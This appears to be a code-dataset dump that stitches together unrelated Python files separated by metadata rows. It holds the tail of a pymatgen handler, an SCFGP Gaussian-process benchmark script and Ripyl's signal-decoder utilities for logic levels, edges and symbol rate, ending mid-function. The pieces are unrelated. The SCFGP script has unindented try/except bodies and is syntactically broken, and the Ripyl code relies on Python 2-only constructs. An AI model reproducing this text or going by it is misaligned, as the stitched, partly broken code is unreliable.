            logger.warning("Error while trying to apply the handler %s: %s", self, exc)
            return None
| rousseab/pymatgen | pymatgen/io/abinitio/events.py | Python | mit | 28,120 | [
"ABINIT",
"NetCDF",
"pymatgen"
] | 5cb0e594a51daee1c551e16f31460119a28a9b434a508296385c8daeaae164b3 |
################################################################################
# SCFGP: Sparsely Correlated Fourier Features Based Gaussian Process
# Github: https://github.com/MaxInGaussian/SCFGP
# Author: Max W. Y. Lam (maxingaussian@gmail.com)
################################################################################
import numpy as np
import matplotlib.pyplot as plt
try:
from SCFGP import *
except:
print("SCFGP is not installed yet! Trying to call directly from source...")
from sys import path
path.append("../../")
from SCFGP import *
print("done.")
def load_kin8nm_data(proportion=3192./8192):
    """Fetch the kin8nm regression dataset and split it into train/test sets.

    proportion is the fraction of examples assigned to the test split.
    Returns (X_train, y_train, X_test, y_test).
    """
    from sklearn import datasets
    from sklearn import cross_validation
    kin8nm = datasets.fetch_mldata('regression-datasets kin8nm')
    features = kin8nm.data[:, :-1].astype(np.float64)
    target = kin8nm.data[:, -1][:, None]
    X_train, X_test, y_train, y_test = cross_validation.train_test_split(
        features, target, test_size=proportion)
    return X_train, y_train, X_test, y_test
# Run the SCFGP regression benchmark several times and report running stats.
repeats = 3
# NOTE(review): feature_size_choices is never used below — confirm whether the
# loop was meant to iterate over it when constructing the model.
feature_size_choices = [50]
scores = []
nmses = []
mnlps = []
for _ in range(repeats):
    X_train, y_train, X_test, y_test = load_kin8nm_data()
    for exp in [True, False]:
        # NOTE(review): `exp` is printed but not passed to SCFGP, so both loop
        # iterations build an identical model — verify this is intended.
        model = SCFGP(-1, 20, False)
        model.fit(X_train, y_train, X_test, y_test, plot_training=True)
        # Accumulate test metrics across all runs for the running averages below.
        nmses.append(model.TsNMSE)
        mnlps.append(model.TsMNLP)
        scores.append(model.SCORE)
        print("\n>>>", model.NAME, exp)
        print(" NMSE = %.4f | Avg = %.4f | Std = %.4f"%(
            model.TsNMSE, np.mean(nmses), np.std(nmses)))
        print(" MNLP = %.4f | Avg = %.4f | Std = %.4f"%(
            model.TsMNLP, np.mean(mnlps), np.std(mnlps)))
        print(" Score = %.4f | Avg = %.4f | Std = %.4f"%(
            model.SCORE, np.mean(scores), np.std(scores)))
"Gaussian"
] | 6473d03bd0e211e062c20947aa33f75679b501033eeab4b1ad16ddb0bdd55a7f |
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''General routines shared between decoders
'''
# Copyright © 2013 Kevin Thibedeau
# This file is part of Ripyl.
# Ripyl is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
# Ripyl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with Ripyl. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function, division
import numpy as np
import scipy as sp
import math
import collections
import itertools
import ripyl.util.stats as stats
from ripyl.streaming import ChunkExtractor, StreamError, AutoLevelError
from ripyl.util.equality import relatively_equal
#import matplotlib.pyplot as plt
def gen_histogram(raw_samples, bins, use_kde=False, kde_bw=0.05):
    '''Generate a histogram using either normal binning or a KDE

    raw_samples (sequence of numbers)
        The population of data samples to histogram

    bins (int)
        Number of histogram bins

    use_kde (bool)
        When True, sample the histogram from a Gaussian KDE instead of binning.
        Useful for noise-free synthetic data sets.

    kde_bw (float)
        Bandwidth parameter for the KDE

    Returns a tuple (hist, bin_centers) with the bin counts and the center
    value of each bin.

    Raises ValueError if a KDE cannot be constructed
    '''
    if use_kde:
        try:
            kde = sp.stats.gaussian_kde(raw_samples, bw_method=kde_bw)
        except np.linalg.linalg.LinAlgError:
            # A constant-valued sample set makes the KDE singular.
            raise ValueError('Cannot construct KDE for histogram approximation. No sample variation present')

        lo = min(raw_samples)
        hi = max(raw_samples)
        # Pad both ends by 10% of the range so gaussian tails fit.
        margin = (hi - lo) * 0.1
        lo -= margin
        hi += margin

        step = (hi - lo) / bins
        bin_centers = np.arange(lo, hi, step)
        hist = 1000 * kde(bin_centers)
    else:
        hist, bin_edges = np.histogram(raw_samples, bins=bins)
        bin_centers = (bin_edges[:-1] + bin_edges[1:]) / 2

    return hist, bin_centers
def find_bot_top_hist_peaks(raw_samples, bins, use_kde=False, kde_bw=0.05):
    '''Find the bottom and top peaks in a histogram of data sample magnitudes.

    These are the left-most and right-most of the two largest peaks in the histogram.

    raw_samples (sequence of numbers)
        The population of data samples to analyze for peaks

    bins (int)
        Number of histogram bins

    use_kde (bool)
        When True, sample the histogram from a Gaussian KDE instead of binning.

    kde_bw (float)
        Bandwidth parameter for the KDE

    Returns a 2-tuple (bot, top) with the center of the histogram bin holding the
    population midpoint of each extreme peak, or None if fewer than two peaks
    are found.

    Raises ValueError if a KDE cannot be constructed
    '''
    hist, bin_centers = gen_histogram(raw_samples, bins, use_kde, kde_bw)

    peaks = find_hist_peaks(hist)

    if len(peaks) < 2:
        # A heavily skewed 1/0 distribution can push the global peak threshold
        # too high. Retry on each half of the histogram independently.
        half = len(hist) // 2
        left = find_hist_peaks(hist[:half])
        right = find_hist_peaks(hist[half:])
        if left and right:
            peaks = list(left)
            peaks.extend((lo + half, hi + half) for lo, hi in right)

    if len(peaks) < 2:
        return None

    # Use only the extreme (lowest and highest) peaks.
    bot_top = []
    for start, end in (peaks[0], peaks[-1]):
        cs = np.cumsum(hist[start:end + 1])
        mid_pop = cs[-1] // 2

        # Locate the bin where the cumulative population crosses the midpoint.
        mid_ix = 0
        for i, running in enumerate(cs):
            if running >= mid_pop:
                mid_ix = i
                break

        #TODO: consider interpolating between two bins nearest to the float(mid_pop)
        bot_top.append(bin_centers[start + mid_ix])

    return tuple(sorted(bot_top))
def find_hist_peaks(hist, thresh_scale=1.0):
    '''Find all peaks in a histogram

    This uses a modification of the method employed by the "peaks" function in
    LeCroy digital oscilloscopes. The original algorithm is described in various manuals
    such as the 9300 WP03 manual or WavePro manual RevC 2002 (p16-14).

    This algorithm works well for real world data sets where the histogram peaks are
    normally distributed (i.e. there is some noise present in the data set).
    For synthetic waveforms lacking noise or any intermediate samples between discrete
    logic levels, the statistical measures used to determine the threshold for a peak
    are not valid. The threshold t2 ends up being too large and valid peaks may be
    excluded. To avoid this problem the histogram can be sampled from a KDE instead or
    the thresh_scale parameter can be set to a lower value.

    hist (sequence of int)
        A sequence representing the histogram bin counts. Typically the first parameter
        returned by numpy.histogram() or a KDE from scipy.stats.gaussian_kde().

    thresh_scale (float)
        Apply a scale factor to the internal threshold for peak classification.

    Returns a list of peaks where each peak is a 2-tuple representing the
        start and end indices of the peak in hist.
    '''
    # get mean of all populated bins
    os = stats.OnlineStats()
    pop_bins = [b for b in hist if b > 0]
    os.accumulate_array(pop_bins)
    pop_mean = os.mean()
    # t1 excludes extreme outliers from the std. dev. estimate below.
    t1 = pop_mean + 2.0 * math.sqrt(pop_mean)
    #print('@@@@@ t1', t1, pop_mean)
    # find std. dev. of all populated bins under t1
    os.reset()
    os.accumulate_array([b for b in pop_bins if b < t1])
    t2 = pop_mean + thresh_scale * 2.0 * os.std(ddof=1) # Lecroy uses 2*std but that can be unreliable
    #print('@@@@@ t2', t2, pop_mean, os.std(ddof=1))
    #plt.plot(hist)
    #plt.axhline(t1, color='k')
    #plt.axhline(t2, color='g')
    #plt.axhline(pop_mean, color='r')
    #plt.axhline(os.mean(), color='y')
    #plt.show()
    # t2 is the threshold we will use to classify a bin as part of a peak
    # Essentially it is saying that a peak is any bin more than 2 std. devs.
    # above the mean. t1 was used to prevent the most extreme outliers from biasing
    # the std. dev.
    # Simple two-state scan: collect maximal runs of bins that stay above t2.
    NEED_PEAK = 1
    IN_PEAK = 2
    state = NEED_PEAK
    peaks = []
    peak_start = -1
    for i, b in enumerate(hist):
        if state == NEED_PEAK:
            if b >= t2:
                peak_start = i
                state = IN_PEAK
        elif state == IN_PEAK:
            if b < t2:
                peaks.append((peak_start, i))
                state = NEED_PEAK
    # if the last bin was the start of a peak then we add it as a special case
    # NOTE(review): a peak that begins before the final bin but is still open at
    # the end of hist appears to be dropped here — confirm whether intended.
    if peak_start == len(hist)-1:
        peaks.append((peak_start, peak_start))
    # Gap limits are proportional to the histogram width.
    merge_gap = len(hist) / 100.0
    suppress_gap = len(hist) / 50.0
    # look for peaks that are within the merge limit
    peak_gaps = [b[0] - a[1] for a, b in zip(peaks[0:-1], peaks[1:])]
    merged = [0] * len(peaks)
    for i, gap in enumerate(peak_gaps):
        if gap < merge_gap:
            # merge these two peaks
            peaks[i+1] = (peaks[i][0], peaks[i+1][1]) # put the prev peak start in this one
            merged[i] = 1
    merged_peaks = [p for i, p in enumerate(peaks) if merged[i] == 0]
    # look for peaks that are within the limit for suppression
    peak_gaps = [b[0] - a[1] for a, b in zip(merged_peaks[0:-1], merged_peaks[1:])]
    suppressed = [0] * len(merged_peaks)
    for i, gap in enumerate(peak_gaps):
        if gap < suppress_gap:
            # suppress the smallest of the two peaks
            ix_l = i
            ix_r = i+1
            width_l = merged_peaks[ix_l][1] - merged_peaks[ix_l][0]
            width_r = merged_peaks[ix_r][1] - merged_peaks[ix_r][0]
            if width_l > width_r: # left peak is bigger
                suppressed[ix_r] = 1
            else: # right peak is bigger
                suppressed[ix_l] = 1
    filtered_peaks = [p for i, p in enumerate(merged_peaks) if suppressed[i] == 0]
    return filtered_peaks
def find_logic_levels(samples, max_samples=20000, buf_size=2000):
    '''Automatically determine the binary logic levels of a digital signal.

    This function consumes up to max_samples from samples in an attempt
    to build a buffer containing a representative set of samples at high
    and low logic levels. Less than max_samples may be consumed if an edge
    is found and the remaining half of the buffer is filled before the
    max_samples threshold is reached.

    Warning: this function is insensitive to any edge transition that
    occurs within the first 100 samples. If the distribution of samples
    is heavily skewed toward one level over the other None may be returned.
    To be reliable, a set of samples should contain more than one edge or
    a solitary edge after the 400th sample.

    samples (iterable of SampleChunk objects)
        An iterable sample stream. Each element is a SampleChunk containing
        an array of samples.

    max_samples (int)
        The maximum number of samples to consume from the samples iterable.
        This should be at least 2x buf_size and will be coerced to that value
        if it is less.

    buf_size (int)
        The maximum size of the sample buffer to analyze for logic levels.
        This should be less than max_samples.

    Returns a 2-tuple (low, high) representing the logic levels of the samples
    Returns None if less than two peaks are found in the sample histogram.
    '''
    # Get a minimal pool of samples containing both logic levels
    # We use a statistical measure to find a likely first edge to minimize
    # the chance that our buffer doesn't contain any edge transmissions.
    et_buf_size = buf_size // 10 # accumulate stats on 1/10 buf_size samples before edge search
    mvavg_size = 10
    noise_filt_size = 3
    # Edge-search state machine states.
    S_FIND_EDGE = 0
    S_FINISH_BUF = 1
    state = S_FIND_EDGE
    # sc counts total samples consumed in the main search loop.
    sc = 0
    # Coerce max samples to ensure that an edge occuring toward the end of an initial
    # buf_size samples can be centered in the buffer.
    if max_samples < 2 * buf_size:
        max_samples = 2 * buf_size
    # Perform an initial analysis to determine the edge threshold of the samples
    samp_it, samp_dly_it, et_it = itertools.tee(samples, 3)
    et_cex = ChunkExtractor(et_it)
    et_samples = et_cex.next_samples(et_buf_size)
    # We will create two moving averages of this pool of data
    # The first has a short period (3 samples) meant to smooth out isolated spikes of
    # noise. The second (10 samples) creates a smoother waveform representing the
    # local median for the creation of the differences later.
    nf_mvavg_buf = collections.deque(maxlen=noise_filt_size) # noise filter
    noise_filtered = []
    et_mvavg_buf = collections.deque(maxlen=mvavg_size)
    et_mvavg = []
    for ns in et_samples:
        nf_mvavg_buf.append(ns)
        noise_filtered.append(sum(nf_mvavg_buf) / len(nf_mvavg_buf)) # calculate moving avg.
        et_mvavg_buf.append(ns)
        et_mvavg.append(sum(et_mvavg_buf) / len(et_mvavg_buf)) # calculate moving avg.
    # The magnitude difference between the samples and their moving average indicates where
    # steady state samples are and where edge transitions are.
    mvavg_diff = [abs(x - y) for x, y in zip(noise_filtered, et_mvavg)]
    # The "noise" difference is the same as above but with the moving average delay removed.
    # This minimizes the peaks from edge transitions and is more representative of the noise level
    # in the signal.
    noise_diff = [abs(x - y) for x, y in zip(noise_filtered, et_mvavg[(mvavg_size//2)-1:])]
    noise_threshold = max(noise_diff) * 1.5
    # The noise threshold gives us a simple test for the presence of edges in the initial
    # pool of data. This will guide our determination of the edge threshold for filling the
    # edge detection buffer.
    edges_present = True if max(mvavg_diff) > noise_threshold else False
    # NOTE: This test for edges present will not work reliably for slowly changing edges
    # (highly oversampled) especially when the SNR is low (<20dB). This should not pose an issue
    # as in this case the edge_threshold (set with 5x multiplier instead of 0.6x) will stay low
    # enough to permit edge detection in the next stage.
    # The test for edges present will also fail when the initial samples are a periodic signal
    # with a short period relative to the sample rate. To cover this case we compute an
    # auto-correlation and look for more than one peak indicating the presence of periodicity.
    acorr_edges_present = False
    if not edges_present:
        norm_noise_filt = noise_filtered - np.mean(noise_filtered)
        auto_corr = np.correlate(norm_noise_filt, norm_noise_filt, 'same')
        ac_max = np.max(auto_corr)
        if ac_max > 0.0:
            # Take the right half of the auto-correlation and normalize to 1000.0
            norm_ac = auto_corr[len(auto_corr)//2:] / ac_max * 1000.0
            ac_peaks = find_hist_peaks(norm_ac, thresh_scale=1.0)
            if len(ac_peaks) > 1:
                p1_max = np.max(norm_ac[ac_peaks[1][0]:ac_peaks[1][1]+1])
                #print('$$$ p1 max:', p1_max)
                if p1_max > 500.0:
                    acorr_edges_present = True
        #print('\n$$$ auto-correlation peaks:', ac_peaks, acorr_edges_present)
        #plt.plot(et_samples)
        #plt.plot(norm_ac)
        #plt.show()
    #rev_mvavg = [(x - y) for x, y in zip(et_mvavg, reversed(et_mvavg))]
    #os = OnlineStats()
    #os.accumulate(rev_mvavg)
    #rev_mvavg = [abs(x - os.mean()) for x in rev_mvavg]
    if edges_present or acorr_edges_present:
        #edge_threshold = max(mad2) * 0.75
        edge_threshold = max(mvavg_diff) * 0.6
    else:
        # Just noise
        #edge_threshold = max(mad2) * 10
        edge_threshold = max(mvavg_diff) * 5
    #print('$$$ edges present:', edges_present, acorr_edges_present, edge_threshold)
    # For synthetic waveforms with no noise present and no edges in the initial samples we will
    # get an edge_threshold of 0.0. In this case we will just set the threshold high enough to
    # detect a deviation from 0.0 for any reasonable real world input
    edge_threshold = max(edge_threshold, 1.0e-9)
    #print('### noise, edge threshold:', noise_threshold, edge_threshold, edges_present)
    del et_it
    # We have established the edge threshold. We will now construct the moving avg. difference
    # again. This time, any difference above the threshold will be an indicator of an edge
    # transition.
    if acorr_edges_present:
        # Periodic signal: the buffer is guaranteed to contain edges, no search needed.
        samp_cex = ChunkExtractor(samp_it)
        buf = samp_cex.next_samples(buf_size)
        state = S_FINISH_BUF
    else:
        mvavg_buf = collections.deque(maxlen=mvavg_size)
        mvavg_dly_buf = collections.deque(maxlen=mvavg_size)
        buf = collections.deque(maxlen=buf_size)
        # skip initial samples to create disparity between samp_cex and dly_cex
        samp_cex = ChunkExtractor(samp_it)
        dly_cex = ChunkExtractor(samp_dly_it)
        delay_samples = 100
        samp_cex.next_samples(delay_samples)
        end_loop = False
        while True:
            cur_samp = samp_cex.next_samples()
            cur_dly_samp = dly_cex.next_samples()
            if cur_samp is None:
                break
            # NOTE(review): xrange is Python 2 only; under Python 3 this would
            # need range() — the module targets Py2 here.
            for i in xrange(len(cur_samp)):
                ns = cur_samp[i]
                sc += 1
                buf.append(ns)
                if state == S_FIND_EDGE:
                    if sc > (max_samples - buf_size):
                        end_loop = True
                        break
                    mvavg_buf.append(ns)
                    mvavg = sum(mvavg_buf) / len(mvavg_buf) # calculate moving avg.
                    mvavg_dly_buf.append(cur_dly_samp[i])
                    mvavg_dly = sum(mvavg_dly_buf) / len(mvavg_dly_buf) # calculate moving avg.
                    if abs(mvavg_dly - mvavg) > edge_threshold:
                        # This is likely an edge event
                        state = S_FINISH_BUF
                        if len(buf) < buf_size // 2:
                            buf_remaining = buf_size - len(buf)
                        else:
                            buf_remaining = buf_size // 2
                        #print('##### Found edge {} {}'.format(len(buf), sc))
                else: # S_FINISH_BUF
                    # Accumulate samples until the edge event is in the middle of the
                    # buffer or the buffer is filled
                    buf_remaining -= 1
                    if buf_remaining <= 0 and len(buf) >= buf_size:
                        end_loop = True
                        break
            if end_loop:
                break
    #plt.plot(et_samples)
    #plt.plot(et_mvavg)
    #plt.plot(noise_filtered)
    #plt.plot(mvavg_diff)
    #plt.plot(noise_diff)
    #plt.plot(rev_mvavg)
    #plt.axhline(noise_threshold, color='r')
    #plt.axhline(edge_threshold, color='g')
    #plt.plot(buf)
    #plt.show()
    # If we didn't see any edges in the buffered sample data then abort
    # before the histogram analysis
    if state != S_FINISH_BUF:
        return None
    try:
        logic_levels = find_bot_top_hist_peaks(buf, 100, use_kde=True)
        #print('### ll:', logic_levels, min(buf), max(buf))
    except ValueError:
        logic_levels = None
    #print('%%% logic_levels', logic_levels)
    return logic_levels
def check_logic_levels(samples, max_samples=20000, buf_size=2000):
    '''Automatically determine the binary logic levels of a digital signal.

    This is a wrapper for find_logic_levels() that handles teeing off
    a buffered sample stream and raising AutoLevelError when detection
    fails.

    samples (iterable of SampleChunk objects)
        An iterable sample stream. Each element is a SampleChunk containing
        an array of samples. This iterator is internally tee'd and becomes
        invalidated for further use. The return value includes a new sample
        stream to retrieve samples from.

    max_samples (int)
        The maximum number of samples to consume from the samples iterable.
        This should be at least 2x buf_size and will be coerced to that value
        if it is less.

    buf_size (int)
        The maximum size of the sample buffer to analyze for logic levels.
        This should be less than max_samples.

    Returns a 2-tuple (sample stream, logic_levels) with the buffered stream
    and the detected (low, high) levels.

    Raises AutoLevelError if less than two peaks are found in the sample histogram.
    '''
    # Tee the stream so level detection does not consume the caller's samples.
    buffered_it, detect_it = itertools.tee(samples)
    levels = find_logic_levels(detect_it, max_samples, buf_size)
    del detect_it

    if levels is None:
        raise AutoLevelError

    return buffered_it, levels
def find_edges(samples, logic, hysteresis=0.4):
    '''Find the edges in a sampled digital waveform

    This generator can be used in a pipeline of waveform processing operations.

    samples (iterable of SampleChunk objects)
        An iterable sample stream. Each element is a SampleChunk containing
        an array of samples.

    logic ((float, float))
        A 2-tuple (low, high) representing the mean logic levels in the sampled waveform

    hysteresis (float)
        A value between 0.0 and 1.0 representing the amount of hysteresis to use for
        detecting valid edge crossings.

    Yields 2-tuples (time, value) with the logic value (0 or 1) at each edge.
    The first tuple yielded is the initial state of the sampled waveform; the
    rest are detected edges.
    '''
    span = logic[1] - logic[0]
    thresh = (logic[1] + logic[0]) / 2.0
    hyst_top = span * (0.5 + hysteresis / 2.0) + logic[0]
    hyst_bot = span * (0.5 - hysteresis / 2.0) + logic[0]

    # Zone codes: stable logic-1, the hysteresis transition band, stable logic-0.
    ZONE_1_L1 = 1
    ZONE_2_T = 2
    ZONE_3_L0 = 3

    def classify(sample):
        # Map a sample value to its zone.
        if sample > hyst_top:
            return ZONE_1_L1
        if sample > hyst_bot:
            return ZONE_2_T
        return ZONE_3_L0

    stable_zones = (ZONE_1_L1, ZONE_3_L0)
    zone_logic = {ZONE_1_L1: 1, ZONE_3_L0: 0}

    ES_START = 0
    state = ES_START
    prev_stable = None

    for sc in samples:
        t = sc.start_time
        sample_period = sc.sample_period
        chunk = sc.samples

        if state == ES_START:
            # Report the waveform's initial logic state before any edges.
            yield (t, 1 if chunk[0] > thresh else 0)

        for sample in chunk:
            zone = classify(sample)

            if state == ES_START:
                # Wait until the signal settles into a stable zone.
                if zone in stable_zones:
                    state = zone
            elif state in stable_zones:
                if zone in stable_zones:
                    if zone != state:
                        state = zone
                        yield (t, zone_logic[zone])
                else:
                    # Entering the hysteresis band; remember where we came from.
                    prev_stable = state
                    state = zone
            else:  # currently inside the hysteresis band
                if zone in stable_zones:
                    if zone != prev_stable:  # a real transition, not just noise
                        yield (t, zone_logic[zone])
                    state = zone

            t += sample_period
def expand_logic_levels(logic_levels, count):
    '''Generate evenly spaced logic levels

    logic_levels ((float, float))
        A 2-tuple (low, high) representing the min and max logic level to expand on

    count (int)
        The number of logic levels in the result. If the value is less than 3, the
        result is the same as the sequence passed as logic_levels.

    Returns a list of logic levels with count length representing each logic level
    evenly spaced between logic_levels[0] and logic_levels[1].
    '''
    if count < 3:
        # Nothing to interpolate; hand back the original sequence unchanged
        return logic_levels

    low = logic_levels[0]
    high = logic_levels[1]
    step = (high - low) / (count - 1)
    # FIX: replaced Python-2-only xrange() with range(); iteration behavior is
    # identical on both Python 2 and 3. Endpoints are returned exactly; only
    # the interior levels are interpolated.
    return [low] + [low + i * step for i in range(1, count - 1)] + [high]
def gen_hyst_thresholds(logic_levels, expand=None, hysteresis=0.1):
    '''Generate hysteresis thresholds for find_multi_edges()

    Computes, for every pair of adjacent logic levels, the lower and upper
    bounds of a hysteresis band centered on their midpoint.

    logic_levels (sequence of float)
        A sequence of the nominal voltage levels for each logic state sorted
        in ascending order or the (low, high) pair when expansion is used.

    expand (int or None)
        When not None, the number of logic levels to expand the provided logic_levels into.

    hysteresis (float)
        A value between 0.0 and 1.0 representing the amount of hysteresis to use for
        detecting valid edge crossings. Values outside that range are clamped.

    Returns a list of floats. Every pair of numbers represents a hysteresis band.
    '''
    if expand:
        assert len(logic_levels) == 2, 'Expansion requires exactly two logic levels.'
        logic_levels = expand_logic_levels(logic_levels, expand)

    assert len(logic_levels) >= 2, 'There must be at least two logic levels'

    # Midpoint between each adjacent pair of logic levels
    midpoints = [(lo + hi) / 2.0 for lo, hi in zip(logic_levels[0:-1], logic_levels[1:])]

    clamped = min(max(hysteresis, 0.0), 1.0) # Coerce to range [0.0, 1.0]

    thresholds = []
    for base, mid in zip(logic_levels[0:-1], midpoints):
        half_band = mid - base
        thresholds.append(half_band * (1 - clamped) + base) # lower bound of the band
        thresholds.append(half_band * (1 + clamped) + base) # upper bound of the band
    return thresholds
def find_multi_edges(samples, hyst_thresholds):
    '''Find the multi-level edges in a sampled digital waveform

    This is a generator function that can be used in a pipeline of waveform
    processing operations.

    Note that the output of this function cannot be used directly without further
    processing. Transitions across multiple states cannot be easily
    distinguished from transitions including intermediate states.
    For the case of three states (-1, 0, 1), short periods in the 0 state
    should be removed but this requires knowledge of the minimum time for a 0 state
    to be valid. This is performed by the remove_transitional_states() function.

    The logic state encoding is formulated to balance the number of positive and negative
    states around 0 for odd numbers of states and with one extra positive state for even
    state numbers. For 2 states the encoding is the usual (0,1). For 3: (-1, 0, 1).
    For 4: (-1, 0, 1, 2). For 5: (-2, -1, 0, 1, 2), etc.

    samples (iterable of SampleChunk objects)
        An iterable sample stream. Each element is a SampleChunk containing
        an array of samples.

    hyst_thresholds (sequence of float)
        A sequence containing the hysteresis thresholds for the logic states.
        For N states there should be (N-1) * 2 thresholds.
        The gen_hyst_thresholds() function can compute these values from more
        usual logic parameters. The numbers must be sorted in ascending order.
        Every pair of numbers in the sequence forms the bounds of a hysteresis
        band. Samples within these bands are considered transient states. Samples
        outside these bands are the valid logic states.

    Yields a series of 2-tuples (time, int) representing the time and
    logic value for each edge transition. The first tuple
    yielded is the initial state of the sampled waveform. All remaining
    tuples are detected edges.

    Raises StreamError if the stream is empty
    '''
    assert len(hyst_thresholds) % 2 == 0, 'There must be an even number of hyst_thresholds'

    # NOTE(review): xrange() below is Python 2 only; this module predates Python 3.

    # To establish the initial state we need to compare the first sample against thresholds
    # without involving any hysteresis. We compute new thresholds at the center of each
    # hysteresis pair.
    center_thresholds = []
    for i in xrange(0, len(hyst_thresholds), 2):
        center_thresholds.append((hyst_thresholds[i] + hyst_thresholds[i+1]) / 2.0)

    def get_sample_zone(sample):
        # Zone index = number of thresholds below the sample; even zones are stable
        for i in xrange(len(hyst_thresholds)):
            if sample <= hyst_thresholds[i]:
                return i
        # The sample is greater than the highest threshold
        return len(hyst_thresholds)

    def is_stable_zone(zone):
        return zone % 2 == 0 # Even zones are stable

    # Compute offset between zone codings and the final logic state coding
    # logic state = zone // 2 - zone_offset
    zone_offset = len(hyst_thresholds) // 4
    #print('### zone offset:', zone_offset, len(hyst_thresholds), hyst_thresholds, center_thresholds)

    def zone_to_logic_state(zone):
        if zone % 2 == 1: # Odd zones are in hysteresis transition bands
            return 999
        return zone // 2 - zone_offset

    # states
    ES_START = 1000

    # NOTE: The remaining states have the same encoding as the zone numbers.
    # These are integers starting from 0. Even zones represent stable states
    # corresponding to the logic levels we want to detect. Odd zones represent
    # unstable states corresponding to samples within the hysteresis transition bands.

    state = ES_START

    for sc in samples:
        t = sc.start_time
        #sample_period = sc.sample_period
        #chunk = sc.samples

        if state == ES_START: # Set initial edge state
            #initial_state = (t, 1 if chunk[0] > thresh_high else 0 if chunk[0] > thresh_low else -1)
            # Classify the very first sample against the hysteresis-free center thresholds
            center_ix = len(center_thresholds)
            for i in xrange(center_ix):
                if sc.samples[0] <= center_thresholds[i]:
                    center_ix = i
                    break
            initial_state = (t, center_ix - zone_offset)
            yield initial_state

        for sample in sc.samples:
            # Manually inlined copies of get_sample_zone() / is_stable_zone()
            # for the hot loop; the commented calls document the equivalent code.
            #zone = get_sample_zone(sample)
            #zone_is_stable = is_stable_zone(zone)

            zone = len(hyst_thresholds)
            for i in xrange(len(hyst_thresholds)):
                if sample <= hyst_thresholds[i]:
                    zone = i
                    break

            zone_is_stable = zone % 2 == 0

            if state == ES_START:
                # Stay in start until we reach one of the stable states
                if zone_is_stable:
                    state = zone
            else:
                if state % 2 == 0: # last zone was a stable state
                    if zone_is_stable:
                        if zone != state:
                            state = zone
                            yield (t, zone // 2 - zone_offset) #zone_to_logic_state(zone))
                    else:
                        # Entered a hysteresis band; remember the stable origin
                        prev_stable = state
                        state = zone
                else: # last zone was a transitional state (in hysteresis band)
                    if zone_is_stable:
                        if zone != prev_stable: # This wasn't just noise
                            yield (t, zone // 2 - zone_offset) #zone_to_logic_state(zone))
                        state = zone

            t += sc.sample_period
def remove_transitional_states(edges, min_state_period):
    '''Filter out brief transitional states from an edge stream

    This is a generator function that can be used in a pipeline of waveform
    processing operations.

    edges (iterable of (float, int) tuples)
        An iterable of 2-tuples representing each edge transition.
        The 2-tuples *must* be in the absolute time form (time, logic level).

    min_state_period (float)
        The threshold for transitional states. A transition lasting less than this
        threshold will be filtered out of the edge stream.

    Yields a series of 2-tuples (time, value) representing the time and
    logic value for each edge transition. The first tuple yielded is the
    initial state of the sampled waveform. All remaining tuples are
    detected edges.

    Raises StreamError if the stream is empty
    '''
    # Prime with the first edge (the initial state of the waveform)
    try:
        pending = next(edges)
    except StopIteration:
        raise StreamError('Unable to initialize edge stream')

    tran_origin = None  # first edge of a short transition run; None -> not in one

    for cur in edges:
        dwell = cur[0] - pending[0]
        if tran_origin is not None:
            # Include the time already spent inside the transition run
            dwell += pending[0] - tran_origin[0]

        if dwell >= min_state_period:
            if tran_origin is not None:
                # Collapse the short run into a single edge at its midpoint
                yield ((tran_origin[0] + pending[0]) / 2, pending[1])
                tran_origin = None
            else:
                yield pending
        elif tran_origin is None: # Start of a transition
            tran_origin = pending

        pending = cur

    yield pending # Last edge
def find_symbol_rate(edges, sample_rate=1.0, spectra=2, auto_span_limit=True, max_span_limit=None):
    '''Determine the base symbol rate from a set of edges

    This function depends on the edge data containing a variety of spans between
    edges all related to the fundamental symbol rate. The Harmonic Product Spectrum
    (HPS) of the edge span values is calculated and used to isolate the fundamental
    symbol rate. This function will not work properly on a clock signal containing
    a single time span between edges due to the lack of higher fundamentals needed
    by the HPS unless spectra=1 which effectively disables the HPS operation.

    edges ([(float, int)...] or [(int, int)...])
        An iterable of 2-tuples representing each edge transition.
        The tuples are in one of two forms:
            * absolute time (time, logic level)
            * sample indexed (index, logic level)
        This function will consume all elements of the edges iterable.
        It must have a finite length

    sample_rate (float)
        An adjustment to convert the raw symbol rate from samples to time.
        If the edges parameter is based on absolute time units then this
        should remain the default value of 1.0.

    spectra (int)
        The number of spectra to include in the calculation of the HPS. This
        number should not be larger than the highest harmonic in the edge span
        data.

    auto_span_limit (bool)
        Excessively long edge spans can impair the symbol rate detection by
        reducing the resolution of the HPS. They are typically the result of
        long idle periods between the interesting parts we want to estimate
        the symbol rate from. When this parameter is True, an attempt is made
        to find the ideal limit for the spans included in the HPS.

    max_span_limit (int)
        An optional upper limit for span length to include in the HPS.
        auto_span_limit must be False for this to take effect.

    Returns the estimated symbol rate of the edge data set as an int

    Raises ValueError if there are not enough edge spans to evaluate
    a HPS.
    '''
    # NOTE(review): e[0] subscripting below relies on Python 2's zip() returning
    # a list; under Python 3 this would need list(zip(*edges)).
    e = zip(*edges)
    e2 = np.array(e[0][1:]) # Get the sample indices of each edge after the first one
    spans = e2[1:] - e2[:-1] # Time span (in samples) between successive edges
    #plt.plot(e[0], e[1])
    #plt.show()

    if auto_span_limit:
        # Automatically find maximum span limit
        # The bw_method parameter is set to smear all small peaks together so
        # that the first peak of the KDE covers the most relevant parts to
        # measure the symbol rate from.
        # NOTE(review): max(spans) runs before the emptiness check two lines
        # below, so an empty span set raises ValueError from max() first --
        # confirm whether the explicit check should come first.
        mv = max(spans) * 1.1 # leave some extra room for the rightmost peak of the KDE
        bins = 1000
        step = mv / bins
        x_hps = np.arange(0, mv, step)[:bins]
        if len(spans) == 0:
            raise ValueError('Insufficient spans in edge set')
        kde = sp.stats.gaussian_kde(spans, bw_method=0.8)
        asl = kde(x_hps)[:bins]

        # Get the width of the first peak
        peaks = find_hist_peaks(asl)
        if len(peaks) >= 1:
            max_span_limit = x_hps[peaks[0][1]] * 2 # set limit to 2x the right edge of the peak

    if max_span_limit is not None:
        # Drop spans at or beyond the limit (idle periods)
        spans = [s for s in spans if s < max_span_limit]

    if len(spans) == 0:
        raise ValueError('Insufficient spans in edge set')

